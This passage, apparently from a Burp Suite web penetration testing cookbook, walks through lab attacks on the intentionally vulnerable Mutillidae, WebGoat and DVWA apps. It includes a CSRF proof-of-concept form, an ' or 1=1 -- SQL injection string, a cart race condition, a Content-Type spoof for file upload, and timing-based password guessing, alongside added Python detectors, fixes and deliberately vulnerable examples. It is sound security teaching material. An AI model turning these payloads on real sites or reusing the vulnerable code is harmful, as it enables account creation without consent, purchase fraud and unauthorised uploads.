9. Return to the User Info page: OWASP 2013 | A1 — Injection (SQL) | SQLi 
— Extract Data | User Info (SQL). 

10. Perform the SQL Injection attack again and verify that you can now see 25 
rows in the account table, instead of the previous count of 24: 


Results for ' or 1=1 -- : 25 records found. 


11. Switch to Burp's Proxy HTTP history tab and view the POST request that 
created the account for the tester. 


12. Studying this POST request shows the POST action (register.php) and the 
body data required to perform the action, in this case, username, password, 
confirm_password, and my_signature. Also notice that no CSRF token is 
used. CSRF tokens are placed within web forms to protect against the very 
attack we are about to perform. Let's proceed. 


13. Right-click the POST request and click on Send to Repeater: 


POST /mutillidae/index.php?page=register.php HTTP/1.1 
Host: 192.168.56.101 
Referer: http://192.168.56.101/mutillidae/index.php?page=register.php 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 147 
Cookie: showhints=1; PHPSESSID=<session token value>; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada 
Connection: close 

csrf-token=&username=tester&password=tester&confirm_password=tester&my_signature=This+is+a+tester+account&register-php-submit-button=Create+Account 


14. If you're using Burp Professional, right-click and select Engagement tools | 
Generate CSRF PoC: 




15. Upon clicking this feature, a pop-up box generates the same form used on 
the registration page but without any CSRF token protection: 




16. If you are using Burp Community, you can easily recreate the CSRF PoC 
form by viewing the source code of the registration page: 




17. While viewing the page source, scroll down to the <form> tag section. For 
brevity, the form is recreated next. Insert attacker as the value for the 
username, password, and signature. Copy the following HTML code 
and save it in a file entitled csrf.html: 


<html> 
<body> 
  <script>history.pushState('', '', '/')</script> 
  <form action="http://192.168.56.101/mutillidae/index.php?page=register.php" method="POST"> 
    <input type="hidden" name="csrf-token" value="" /> 
    <input type="hidden" name="username" value="attacker" /> 
    <input type="hidden" name="password" value="attacker" /> 
    <input type="hidden" name="confirm_password" value="attacker" /> 
    <input type="hidden" name="my_signature" value="attacker account" /> 
    <input type="hidden" name="register-php-submit-button" value="Create Account" /> 
    <input type="submit" value="Submit request" /> 
  </form> 
</body> 
</html> 


18. Now, return to the login screen (click Login/Register from the top menu), 
and log in to the application, using the username ed and the password 
pentest. 

19. Open the location on your machine where you saved the csrf.html file. 
Drag the file into the browser where ed is authenticated. After you drag the 
file to this browser, csrf.html will appear as a separate tab in the same 
browser: 




20. For demonstration purposes, there is a Submit request button. However, in 
the wild, a JavaScript function would automatically execute the action of 
creating an account for the attacker. Click the Submit request button: 




You should receive a confirmation that the attacker account is created: 




21. Switch to Burp's Proxy | HTTP history tab and find the maliciously 
executed POST used to create the account for the attacker, while riding on 
ed's authenticated session: 


POST /mutillidae/index.php?page=register.php HTTP/1.1 
Host: 192.168.56.101 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 145 
Cookie: showhints=1; username=ed; uid=24; PHPSESSID=<session token value>; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada 
Connection: close 

csrf-token=&username=attacker&password=attacker&confirm_password=attacker&my_signature=attacker+account&register-php-submit-button=Create+Account 


22. Return to the User Info page: OWASP 2013 | A1 — Injection (SQL) | SQLi 
— Extract Data | User Info (SQL), and perform the SQL Injection attack 
again. You will now see 26 rows in the account table instead of the previous 
count of 25: 


Results for ' or 1=1 -- : 26 records found. 


How it works... 


CSRF attacks require an authenticated user session to surreptitiously perform 
actions within the application on behalf of the attacker. In this case, an attacker 
rides on ed's session to re-run the registration form, to create an account for the 
attacker. If ed had been an admin, this could have allowed the account role to be 
elevated as well. 
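The inspection done by eye in the two previous recipes, listing hidden form fields (and rewriting them the way Burp's Unhide hidden form fields option does) and checking a state-changing form for a missing or empty CSRF token, as an added Python example that is not code from the book, from Burp or from Mutillidae. The HTML snippets are constructed to resemble the Mutillidae register and User Info forms; the token value in the protected variant is made up.

```python
# Added example serving the two recipes above (exposed hidden fields and
# CSRF); it is not code from the book, from Burp or from Mutillidae. It does
# in Python what the tester does by eye: list hidden form fields, rewrite them
# the way Burp's "Unhide hidden form fields" does, and flag state-changing
# forms whose CSRF token is missing or empty. The HTML below is constructed.
import re
from html.parser import HTMLParser
from typing import Dict, List, Optional

CSRF_FIELD_NAMES = ("csrf-token", "csrf_token", "_token")


class FormCollector(HTMLParser):
    """Collect every <form> with its method, action and <input> fields."""

    def __init__(self) -> None:
        super().__init__()
        self.forms: List[Dict] = []
        self._current: Optional[Dict] = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}   # valueless attributes -> ''
        if tag == "form":
            self._current = {"action": a.get("action", ""),
                             "method": a.get("method", "get").lower(),
                             "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append({"type": a.get("type", "text").lower(),
                                            "name": a.get("name", ""),
                                            "value": a.get("value", "")})

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def collect_forms(html: str) -> List[Dict]:
    parser = FormCollector()
    parser.feed(html)
    return parser.forms


def hidden_fields(html: str) -> List[Dict]:
    """Every hidden input, with the action of the form that carries it."""
    return [{"form": f["action"], "name": i["name"], "value": i["value"]}
            for f in collect_forms(html) for i in f["inputs"] if i["type"] == "hidden"]


def unhide(html: str) -> str:
    """Rewrite type="hidden" to type="text", as Burp's response modification
    does, so the field renders as an editable text box in the browser."""
    return re.sub(r'type\s*=\s*(["\']?)hidden\1', r'type=\1text\1', html, flags=re.I)


def csrf_findings(html: str) -> List[str]:
    """For each POST form: report no token field, or a token field left empty."""
    findings = []
    for form in collect_forms(html):
        if form["method"] != "post":
            continue
        tokens = [i for i in form["inputs"] if i["name"].lower() in CSRF_FIELD_NAMES]
        if not tokens:
            findings.append(f"{form['action']}: POST form has no CSRF token field")
        elif all(t["value"] == "" for t in tokens):
            findings.append(f"{form['action']}: CSRF token field '{tokens[0]['name']}' is empty")
    return findings


# Constructed HTML resembling the Mutillidae register and User Info forms.
REGISTER_PAGE = """
<form action="index.php?page=register.php" method="POST">
  <input type="hidden" name="csrf-token" value="" />
  <input type="text" name="username" />
  <input type="password" name="password" />
  <input type="password" name="confirm_password" />
  <input type="text" name="my_signature" />
  <input type="submit" name="register-php-submit-button" value="Create Account" />
</form>"""
USER_INFO_PAGE = """
<form action="index.php" method="GET">
  <input type="hidden" name="page" value="user-info.php" />
  <input type="text" name="username" />
  <input type="password" name="password" />
  <input type="submit" name="user-info-php-submit-button" value="View Account Details" />
</form>"""
# Same register form with a per-session token filled in (constructed value).
PROTECTED_PAGE = REGISTER_PAGE.replace('name="csrf-token" value=""',
                                       'name="csrf-token" value="EXAMPLE_TOKEN_1234"')

if __name__ == "__main__":
    print(hidden_fields(USER_INFO_PAGE))
    print(csrf_findings(REGISTER_PAGE))
    print(unhide(USER_INFO_PAGE))
```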


Assessing Business Logic 


In this chapter, we will cover the following recipes: 

Testing business logic data validation 
Unrestricted file upload — bypassing weak validation 
Performing process-timing attacks 
Testing for the circumvention of workflows 
Uploading malicious files — polyglots 


Introduction 


This chapter covers the basics of business logic testing, including an 
explanation of some of the more common tests performed in this area. Web 
penetration testing involves key assessments of business logic to determine how 
well the design of an application performs integrity checks, especially within 
sequential application function steps, and we will be learning how to use Burp to 
perform such tests. 


Software tool requirements 


To complete the recipes in this chapter, you will need the following: 


• OWASP Broken Web Applications (VM) 
• OWASP Mutillidae link 
• Burp Proxy Community or Professional (https://portswigger.net/burp/) 


Testing business logic data validation 


Business logic data validation errors occur due to a lack of server-side checks, 
especially in a sequence of events such as shopping cart checkouts. If design 
flaws, such as thread issues, are present, those flaws may allow an attacker to 
modify or change their shopping cart contents or prices, prior to purchasing 
them, to lower the price paid. 
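A race of the kind just described, reproduced as a deterministic replay of the two-tab sequence against a hypothetical cart model, beside a hardened checkout that binds the quoted price to a snapshot of the cart. This is an added Python example, not WebGoat's code; the assumption that price is fixed at Purchase while quantities are re-read at Confirm is the model's, and only the catalogue prices come from the lesson.

```python
# Added example for the flaw described above; it is not WebGoat's code. The
# checkout classes are a hypothetical model of a cart whose total is fixed
# when the buyer clicks Purchase but whose quantities are read again when the
# buyer clicks Confirm, so a cart update from a second tab in between changes
# what ships without changing what is charged. The hardened version snapshots
# the cart at Purchase and refuses to Confirm if it has changed since.
# Prices (in cents) are the WebGoat lesson's catalogue.
from typing import Dict, Optional

PRICES_CENTS = {
    "Hitachi - 750GB External Hard Drive": 169_00,
    "Hewlett-Packard - All-in-One Laser Printer": 299_00,
    "Sony - Vaio with Intel Centrino": 1799_00,
    "Toshiba - XGA LCD Projector": 649_00,
}


class CartChangedError(Exception):
    """Confirm was attempted after the cart diverged from the quoted order."""


class VulnerableCheckout:
    """One server-side session: a mutable cart shared by every browser tab."""

    def __init__(self) -> None:
        self.cart: Dict[str, int] = {item: 0 for item in PRICES_CENTS}
        self.quoted_total: Optional[int] = None

    def update_cart(self, item: str, qty: int) -> None:
        self.cart[item] = qty

    def total(self) -> int:
        return sum(PRICES_CENTS[i] * q for i, q in self.cart.items())

    def purchase(self) -> int:
        """'Purchase' button: quote a total and show the Confirm screen."""
        self.quoted_total = self.total()
        return self.quoted_total

    def confirm(self) -> Dict:
        """'Confirm' button: charge the quoted total, ship the cart as it is NOW."""
        return {"charged": self.quoted_total, "shipped": dict(self.cart)}


class HardenedCheckout(VulnerableCheckout):
    """Bind the quote to a snapshot of the cart and re-check it on Confirm."""

    def purchase(self) -> int:
        self.snapshot = dict(self.cart)
        return super().purchase()

    def confirm(self) -> Dict:
        if self.cart != self.snapshot:
            raise CartChangedError("cart changed since the quote; re-run Purchase")
        return {"charged": self.quoted_total, "shipped": dict(self.snapshot)}


def two_tab_attack(checkout: VulnerableCheckout, item: str, inflated_qty: int) -> Dict:
    """Replay the recipe's tab sequence against a checkout implementation."""
    checkout.update_cart(item, 1)             # tab 1: quantity 1, Update Cart
    checkout.purchase()                       # tab 1: Purchase -> quote shown
    checkout.update_cart(item, inflated_qty)  # tab 2: quantity 10, Update Cart
    try:
        return checkout.confirm()             # tab 1: Confirm
    except CartChangedError as exc:
        return {"rejected": str(exc)}


if __name__ == "__main__":
    laptop = "Sony - Vaio with Intel Centrino"
    print(two_tab_attack(VulnerableCheckout(), laptop, 10))
    print(two_tab_attack(HardenedCheckout(), laptop, 10))
```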


Getting ready 


Using the OWASP WebGoat application and Burp, we will exploit a business 
logic design flaw, to purchase many large ticket items for a very cheap price. 


How to do it... 


1. Ensure the owaspbwa VM is running. Select the OWASP WebGoat 
application from the initial landing page of the VM. The landing page will 
be configured to an IP address specific to your machine: 




2. After you click the OWASP WebGoat link, you will be prompted for some 
login credentials. Use these credentials: User Name: guest Password: 
guest. 


3. After authentication, click the Start WebGoat button to access the 
application exercises: 




4. Click Concurrency | Shopping Cart Concurrency Flaw from the left-hand 
menu: 




The exercise explains there is a thread issue in the design of the shopping 
cart that will allow us to purchase items at a lower price. Let's exploit the 
design flaw! 


5. Add 1 to the Quantity box for the Sony - Vaio with Intel Centrino 
item. Click the Update Cart button: 




6. Switch to Burp Proxy | HTTP history tab. Find the cart request, right-click, 
and click Send to Repeater: 


POST /WebGoat/attack?Screen=15&menu=800 HTTP/1.1 
Host: 192.168.56.101 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 46 
Cookie: JSESSIONID=<session token value>; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada 
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= 
Connection: close 

QTY1=0&QTY2=0&QTY3=1&QTY4=0&SUBMIT=Update+Cart 


7. Inside Burp's Repeater tab, change the QTY3 parameter from 1 to 10: 


QTY1=0&QTY2=0&QTY3=10&QTY4=0&SUBMIT=Update+Cart 


8. Stay in Burp Repeater, and in the request pane, right-click and select 
Request in browser | In current browser session: 




9. A pop-up displays the modified request. Click the Copy button: 




10. Using the same Firefox browser containing the shopping cart, open a new 
tab and paste in the URL that you copied to the clipboard in the previous 
step: 


11. Press the Enter key to see the request resubmitted with a modified quantity 
of 10: 




12. Switch to the original tab containing your shopping cart (the cart with the 
original quantity of 1). Click the Purchase button: 


[Screenshot: the original tab's Shopping Cart, with the Sony - Vaio with Intel Centrino still at quantity 1 and the other items at quantity 0, above the Update Cart and Purchase buttons]


13. At the next screen, before clicking the Confirm button, switch to the second 
tab, and update the cart again, but this time with our new quantity of 10, and 
click on Update Cart: 


[Screenshot: the second tab after clicking Update Cart: Sony - Vaio with Intel Centrino, $1799.00, quantity 10, subtotal $17,990.00; Total: $17,990.00]
14. Return to the first tab, and click the Confirm button: 


[Screenshot: the Place your order page in the first tab. The cart table lists Sony - Vaio with Intel Centrino, $1799.00, quantity 1, subtotal $1,799.00 (all other items at quantity 0); Total: $1799.00; Enter your credit card number: 5321 1337 8888 2007; Enter your three digit access code: 111; Confirm and Cancel buttons]


Notice we were able to purchase 10 Sony Vaio laptops for the price of one! 


[Screenshot: the lesson's confirmation page. It reads "Thank you for shopping! You have (illegally!) received a 90% discount. Police are on the way to your IP address." and "Congratulations. You have successfully completed this lesson." Confirmation number: CONC-88. The order table shows Sony - Vaio with Intel Centrino, $1799.00, quantity 10, subtotal $17,990.00, and Total Amount Charged to Your Credit Card: $1,799.00]


How it works... 


Thread-safety issues can produce unintended results. For many languages, the 
developer's knowledge of how to declare variables and methods as thread-safe is 
imperative. Threads that are not isolated, such as the cart contents shown in this 
recipe, can result in users gaining unintended discounts on products: the cart is 
shared state that the purchase flow reads twice, once to price the order when 
Purchase is clicked and again to fulfil it when Confirm is clicked, so a change made 
between those two reads is shipped at the old price. 
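To make the race concrete, here is an added Python sketch (not WebGoat's code) of a session-scoped cart: the vulnerable checkout prices the order from the live cart at Purchase and fulfils from the live cart again at Confirm, so a quantity change between the two steps ships more than was charged; the fixed version freezes the order at Purchase and refuses to confirm once the cart has changed. Threading events force the two-tab interleaving deterministically; product names and prices are taken from the lesson's cart.

```python
import threading
from typing import Callable, Dict, Tuple

# Catalogue prices as shown in the WebGoat lesson's cart.
CATALOG = {"Sony Vaio": 1799.00, "Hitachi 750GB": 169.00}


class SessionCart:
    """One cart object per session, shared by every request (tab) in that session."""

    def __init__(self) -> None:
        self.items: Dict[str, int] = {}
        self.lock = threading.Lock()

    def update(self, product: str, qty: int) -> None:
        with self.lock:
            self.items[product] = qty

    def snapshot(self) -> Dict[str, int]:
        with self.lock:
            return dict(self.items)


def price(items: Dict[str, int]) -> float:
    return round(sum(CATALOG[p] * q for p, q in items.items()), 2)


def vulnerable_checkout(cart: SessionCart, priced: threading.Event,
                        changed: threading.Event) -> Tuple[float, Dict[str, int]]:
    """Purchase prices the live cart; Confirm re-reads the live cart to fulfil."""
    charged = price(cart.snapshot())      # step 12: Purchase
    priced.set()                          # the other tab now gets its turn ...
    changed.wait()                        # ... and updates the quantity meanwhile
    shipped = cart.snapshot()             # step 14: Confirm reads the cart again
    return charged, shipped


def safe_checkout(cart: SessionCart, priced: threading.Event,
                  changed: threading.Event) -> Tuple[float, Dict[str, int]]:
    """Purchase freezes an order; Confirm fulfils that order, not the live cart."""
    order = cart.snapshot()               # immutable copy taken at Purchase time
    charged = price(order)
    priced.set()
    changed.wait()
    if cart.snapshot() != order:          # cart edited since pricing: abort
        raise RuntimeError("cart changed after pricing; order must be re-priced")
    return charged, order


def run_race(checkout: Callable[..., Tuple[float, Dict[str, int]]]) -> dict:
    """Drive the recipe's interleaving: price 1 laptop, then change the cart to 10."""
    cart = SessionCart()
    cart.update("Sony Vaio", 1)
    priced, changed = threading.Event(), threading.Event()
    outcome: dict = {}

    def buyer_tab() -> None:
        try:
            outcome["result"] = checkout(cart, priced, changed)
        except RuntimeError as exc:
            outcome["error"] = str(exc)

    tab = threading.Thread(target=buyer_tab)
    tab.start()
    priced.wait()                         # wait until Purchase has priced the cart
    cart.update("Sony Vaio", 10)          # step 13: second tab sets quantity to 10
    changed.set()
    tab.join()
    return outcome


if __name__ == "__main__":
    print("vulnerable:", run_race(vulnerable_checkout))
    print("fixed:     ", run_race(safe_checkout))
```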


Unrestricted file upload — bypassing weak validation 


Many applications allow for files to be uploaded for various reasons. Business 
logic on the server-side must include checking for acceptable files; this is known 
as whitelisting. If such checks are weak or only address one aspect of file 
attributes (for example, file extensions only), attackers can exploit these 
weaknesses and upload unexpected file types that may be executable on the 
server. 


Getting ready 


Using the Damn Vulnerable Web Application (DVWA) and Burp, we will exploit 
a business logic design flaw in the file upload page. 


How to do it... 


1. Ensure the owaspbwa VM is running. Select DVWA from the initial 
landing page of the VM. The landing page will be configured to an IP 
address specific to your machine. 

2. At the login page, use these credentials: Username: user; Password: user. 

3. Select the DVWA Security option from the menu on the left. Change the 
default setting of low to medium and then click Submit: 


[Screenshot: the DVWA Security page. The Script Security section reads "Security Level is currently medium. You can set the security level to low, medium or high. The security level changes the vulnerability level of DVWA." with a drop-down offering low, medium and high and a Submit button; below it, PHPIDS v.0.6 is shown as currently disabled]


4. Select the Upload page from the menu on the left: 


[Screenshot: the DVWA Vulnerability: File Upload page: "Choose an image to upload:" with Browse... and Upload buttons, and More info links to http://www.owasp.org/index.php/Unrestricted_File_Upload and http://www.acunetix.com/websitesecurity/upload-forms-threat.htm]


5. Note the page instructs users to only upload images. If we try another type 
of file other than a JPG image, we receive an error message in the upper 
left-hand corner: 


Your image was not uploaded. 


6. On your local machine, create a file of any type other than JPG. For 
example, create a Microsoft Excel file called 
malicious_spreadsheet.xlsx. It does not need to have any content for the 
purpose of this recipe. 

7. Switch to Burp's Proxy | Intercept tab. Turn Interceptor on with the button 
Intercept is on. 

8. Return to Firefox, use the Browse button to find the 
malicious_spreadsheet.xlsx file on your system, and click the Upload 
button: 


[Screenshot: the File Upload form with malicious_spreadsheet.xlsx selected next to the Browse... button, before clicking Upload]


9. With the request paused in Burp's Proxy | Intercept tab, change the 
Content-Type of the uploaded file from 
application/vnd.openxmlformats-officedocument.spreadsheetml.sheet to 
image/jpeg instead. 
   ◦ Here is the original (the multipart boundary is abbreviated): 

      -----------------------------<boundary>
      Content-Disposition: form-data; name="MAX_FILE_SIZE"

      100000
      -----------------------------<boundary>
      Content-Disposition: form-data; name="uploaded"; filename="malicious_spreadsheet.xlsx"
      Content-Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet

   ◦ Here is the modified version: 

      -----------------------------<boundary>
      Content-Disposition: form-data; name="MAX_FILE_SIZE"

      100000
      -----------------------------<boundary>
      Content-Disposition: form-data; name="uploaded"; filename="malicious_spreadsheet.xlsx"
      Content-Type: image/jpeg


10. Click the Forward button. Now turn Interceptor off by clicking the toggle 
button to Intercept is off. 

11. Note the file uploaded successfully! We were able to bypass the weak data 
validation checks and upload a file other than an image: 


[Screenshot: the File Upload page after forwarding the request, showing the message "../../hackable/uploads/malicious_spreadsheet.xlsx succesfully uploaded!"]


How it works... 


Due to weak server-side checks, we are able to easily circumvent the image- 
only restriction and upload a file type of our choice. The application code only 
checks for content types matching image/jpeg, which is easily modified with an 
intercepting proxy such as Burp. Developers need to simultaneously whitelist 
both content-type as well as file extensions in the application code to prevent 
this type of exploit from occurring. 
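The following Python example is added here and is not DVWA's code: it parses a form-data body shaped like the intercepted upload request and contrasts the bypassed check (trusting the client's Content-Type alone) with a whitelist that requires the extension, the declared content type and the file's own bytes to agree. The boundary, the .xlsx bytes and the JPEG skeleton are constructed sample data.

```python
import re
from typing import Dict, List, Tuple

# Constructed boundary; the real one is in the intercepted request above.
BOUNDARY = b"---------------------------160903101016069"
ALLOWED_EXTENSIONS = {"jpg", "jpeg"}
ALLOWED_CONTENT_TYPES = {"image/jpeg"}
JPEG_SOI = b"\xff\xd8\xff"      # every JPEG starts with these bytes ...
JPEG_EOI = b"\xff\xd9"          # ... and ends with the End Of Image marker


def build_upload_body(filename: bytes, declared_type: bytes, data: bytes) -> bytes:
    """Assemble a form-data body shaped like the DVWA upload form's request."""
    parts = [
        b"--" + BOUNDARY,
        b'Content-Disposition: form-data; name="MAX_FILE_SIZE"',
        b"",
        b"100000",
        b"--" + BOUNDARY,
        b'Content-Disposition: form-data; name="uploaded"; filename="' + filename + b'"',
        b"Content-Type: " + declared_type,
        b"",
        data,
        b"--" + BOUNDARY + b"--",
        b"",
    ]
    return b"\r\n".join(parts)


def parse_multipart(body: bytes, boundary: bytes) -> List[Tuple[Dict[str, str], bytes]]:
    """Minimal multipart/form-data splitter: returns (headers, payload) per part."""
    delimiter = b"\r\n--" + boundary
    parts = []
    for chunk in (b"\r\n" + body).split(delimiter)[1:]:
        if chunk.startswith(b"--"):
            break                                   # closing delimiter reached
        head, _, payload = chunk[2:].partition(b"\r\n\r\n")  # drop CRLF after delimiter
        headers: Dict[str, str] = {}
        for line in head.split(b"\r\n"):
            name, _, value = line.decode("latin-1").partition(":")
            headers[name.strip().lower()] = value.strip()
        parts.append((headers, payload))
    return parts


def file_part(body: bytes) -> Tuple[str, str, bytes]:
    """Return (filename, declared content type, bytes) of the first file field."""
    for headers, payload in parse_multipart(body, BOUNDARY):
        m = re.search(r'filename="([^"]*)"', headers.get("content-disposition", ""))
        if m:
            return m.group(1), headers.get("content-type", ""), payload
    raise ValueError("no file part in body")


def weak_is_image(body: bytes) -> bool:
    """The bypassed check: trusts the client-supplied Content-Type header only."""
    _, declared_type, _ = file_part(body)
    return declared_type in ALLOWED_CONTENT_TYPES


def strict_is_image(body: bytes) -> Tuple[bool, str]:
    """Whitelist extension AND content type AND the bytes themselves."""
    filename, declared_type, data = file_part(body)
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension '{ext}' not allowed"
    if declared_type not in ALLOWED_CONTENT_TYPES:
        return False, f"content type '{declared_type}' not allowed"
    if not (data.startswith(JPEG_SOI) and data.endswith(JPEG_EOI)):
        return False, "file body is not a JPEG"
    return True, "ok"


# Constructed sample uploads: a zip-based .xlsx (starts with 'PK') and a JPEG skeleton.
XLSX_BYTES = b"PK\x03\x04" + b"\x00" * 28
JPEG_BYTES = JPEG_SOI + b"\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00" + JPEG_EOI

SPOOFED = build_upload_body(b"malicious_spreadsheet.xlsx", b"image/jpeg", XLSX_BYTES)
HONEST = build_upload_body(b"malicious_spreadsheet.xlsx",
                           b"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet",
                           XLSX_BYTES)
GENUINE = build_upload_body(b"photo.jpg", b"image/jpeg", JPEG_BYTES)

if __name__ == "__main__":
    for label, body in (("spoofed", SPOOFED), ("honest", HONEST), ("genuine", GENUINE)):
        print(label, "weak:", weak_is_image(body), "strict:", strict_is_image(body))
```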


Performing process-timing attacks 


By monitoring the time an application takes to complete a task, it is possible for 
attackers to gather or infer information about how an application is coded. For 
example, a login process using valid credentials receives a response quicker than 
the same login process given invalid credentials. This delay in response time 
leaks information related to system processes. An attacker could use a response 
time to perform account enumeration and determine valid usernames based upon 
the time of the response. 


Getting ready 


For this recipe, you will need the common_pass.txt wordlist from wfuzz: 


• https://github.com/xmendez/wfuzz 
   ◦ Path: wordlists | other | common_pass.txt 


Using OWASP Mutillidae II, we will determine whether the application provides 
information leakage based on the response time from forced logins. 


How to do it... 


Ensure Burp is running, and also ensure that the owaspbwa VM is running and 
that Burp is configured in the Firefox browser used to view owaspbwa 
applications. 


1. From the owaspbwa landing page, click the link to OWASP Mutillidae II 
application. 

2. Open Firefox browser to the home of OWASP Mutillidae II (URL: 
http://<your_VM_assigned_IP_address>/mutillidae/). 

3. Go to the login page and log in using the username ed and the password 
pentest. 

4. Switch to Burp's Proxy | HTTP history tab, find the login you just 
performed, right-click, and select Send to Intruder: 


[Screenshot: Burp's Proxy | HTTP history tab with the context menu open on the login request and Send to Intruder highlighted. The request reads POST /mutillidae/index.php?page=login.php HTTP/1.1, Host: 192.168.56.101, Content-Type: application/x-www-form-urlencoded, Content-Length: 58, with the body username=ed&password=pentest&login-php-submit-button=Login]


5. Go to the Intruder | Positions tab, and clear all the payload markers, using 
the Clear § button on the right-hand side: 


[Screenshot: the Intruder | Positions tab, Attack type: Sniper, before Clear § is clicked: § payload markers are automatically placed around the page parameter in the URL, every cookie value (including PHPSESSID) and all three body parameters, username, password and login-php-submit-button]


6. Select the password field and click the Add § button to wrap a payload 
marker around that field: 


[Screenshot: the Intruder | Positions tab after Clear § and Add §: the only payload marker is around the password value, and the Cookie header still carries its PHPSESSID value]


7. Also, remove the PHPSESSID token. Delete the value present in this token 
(the content following the equals sign) and leave it blank. This step is very 
important, because if you happen to leave this token in the requests, you 
will be unable to see the difference in the timings, since the application will 
think you are already logged in: 


[Screenshot: the final Payload Positions, Attack type: Sniper. The Cookie header now ends after the Server cookie, with the PHPSESSID value removed, and the body reads username=ed&password=§pentest§&login-php-submit-button=Login]


8. Go to the Intruder | Payloads tab. Within the Payload Options [Simple list], 
we will add some invalid values by using a wordlist from wfuzz 
containing common passwords: wfuzz | wordlists | other | 
common_pass.txt: 


[Screenshot: Payload Options [Simple list] populated from common_pass.txt with entries such as 123456, 1234567, 12345678, 123asdf, Admin, admin, administrator and asdf123]


9. Scroll to the bottom and uncheck the checkbox for Payload Encoding: 


[Screenshot: the Payload Encoding section ("This setting can be used to URL-encode selected characters within the final payload, for safe transmission within HTTP requests.") with the URL-encode these characters checkbox unchecked]


10. Click the Start attack button. An attack results table appears. Let the attacks 
complete. From the attack results table, select Columns and check Response 
received. Check Response completed to add these columns to the attack 
results table: 


[Screenshot: the Intruder attack results window, with the Columns menu open to add the Response received and Response completed columns to the results table]


11. Analyze the results provided. Though not obvious on every response, note 
the delay when an invalid password such as administrator is used: the 
Response received timing is 156, but the Response completed timing is 
166. However, the valid password pentest (the only request answered with a 
302 status) receives an immediate response: 50 (received) and 50 (completed): 


[Screenshot: the attack results table with the Request, Payload, Status, Response received, Response completed, Error, Timeout and Length columns; the rows for invalid passwords show noticeably higher timings than the row for the valid one]


How it works... 


Information leakage can occur when processing error messages or invalid coding 
paths takes longer than valid code paths. Developers must ensure the business 
logic does not give away such clues to attackers. 
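As an added illustration of the fix (this is not Mutillidae's code), the Python below contrasts a login whose outcomes take different code paths (no hashing for unknown users, extra failure-only work for wrong passwords) with one that performs the same steps in the same order for every outcome and compares digests in constant time. The credential store for ed / pentest is constructed, the failure-path work is simulated with a short sleep, and median_ms measures locally what Intruder's timing columns approximate.

```python
import hashlib
import hmac
import os
import statistics
import time
from typing import Callable, List, Tuple

# Constructed credential store holding the recipe's test account (ed / pentest).
_SALT = os.urandom(16)


def _kdf(password: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), _SALT, 20_000)


USERS = {"ed": _kdf("pentest")}
_DECOY = _kdf("decoy-password-never-accepted")   # keeps unknown users as slow as known ones


def _record_failure(trace: List[str]) -> None:
    """Stand-in for failure-only work: audit log write, lockout counter, error page."""
    trace.append("record_failure")
    time.sleep(0.001)


def leaky_login(username: str, password: str) -> Tuple[bool, Tuple[str, ...]]:
    """Each outcome follows a different path, so each outcome takes a different time."""
    trace: List[str] = []
    stored = USERS.get(username)
    if stored is None:
        trace.append("no_such_user")          # no KDF at all: the fastest response
        return False, tuple(trace)
    trace.append("kdf")
    if _kdf(password) == stored:              # plain == may stop at the first differing byte
        trace.append("session_start")
        return True, tuple(trace)
    _record_failure(trace)                    # extra work only when the password is wrong
    return False, tuple(trace)


def uniform_login(username: str, password: str) -> Tuple[bool, Tuple[str, ...]]:
    """Same steps in the same order for every outcome; only the result bit differs."""
    trace: List[str] = []
    known = username in USERS
    stored = USERS.get(username, _DECOY)      # unknown users still pay for the KDF
    trace.append("kdf")
    ok = hmac.compare_digest(_kdf(password), stored) & known
    trace.append("record_attempt")            # log success and failure alike ...
    time.sleep(0.001)                         # ... at the same cost
    return ok, tuple(trace)


def median_ms(login: Callable[[str, str], Tuple[bool, Tuple[str, ...]]],
              username: str, password: str, rounds: int = 30) -> float:
    """Median wall-clock time of a login attempt, in milliseconds."""
    samples = []
    for _ in range(rounds):
        start = time.perf_counter()
        login(username, password)
        samples.append((time.perf_counter() - start) * 1000)
    return statistics.median(samples)


if __name__ == "__main__":
    for name, fn in (("leaky", leaky_login), ("uniform", uniform_login)):
        for user, pw in (("ed", "pentest"), ("ed", "administrator"), ("nobody", "x")):
            print(f"{name:8} {user:7} {pw:14} {median_ms(fn, user, pw):7.2f} ms")
```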


Testing for the circumvention of work flows 


Shopping cart to payment gateway interactions must be tested by web app 
penetration testers to ensure the workflow cannot be performed out of sequence. 
A payment should never be made unless a verification of the cart contents is 
checked on the server-side first. In the event this check is missing, an attacker 
can change the price, quantity, or both, prior to the actual purchase. 


Getting ready 


Using the OWASP WebGoat application and Burp, we will exploit a business 
logic design flaw in which there is no server-side validation prior to a purchase. 


How to do it... 


1. Ensure the owaspbwa VM is running. Select the OWASP WebGoat 
application from the initial landing page of the VM. The landing page will 
be configured to an IP address specific to your machine. 

2. After you click the OWASP WebGoat link, you will be prompted for login 
credentials. Use these credentials: User Name: guest; password: guest. 

3. After authentication, click the Start WebGoat button to access the 
application exercises. 

4. Click AJAX Security | Insecure Client Storage from the left-hand menu. 
You are presented with a shopping cart: 


[Screenshot: the WebGoat Insecure Client Storage lesson. It reads "STAGE 1: For this exercise, your mission is to discover a coupon code to receive an unintended discount." The Shopping Cart lists Studio RTA - Laptop/Reading Cart with Tilting Surface - Cherry ($69.99), Dynex - Traditional Notebook Case ($27.99), Hewlett-Packard - Pavilion Notebook with Intel Centrino ($1599.99) and 3 - Year Performance Service Plan $1000 and Over ($299.99), all at quantity 0; Total before coupon is applied: $0.00; Total to be charged to your credit card: $0.00; Enter your credit card number: 4128 3214 0002 1999; an Enter your coupon code field; and a Purchase button]


5. Switch to Burp's Proxy | HTTP history tab, Click the Filter button, and 
ensure your Filter by MIME type section includes Script. If Script is not 
checked, be sure to check it now: 


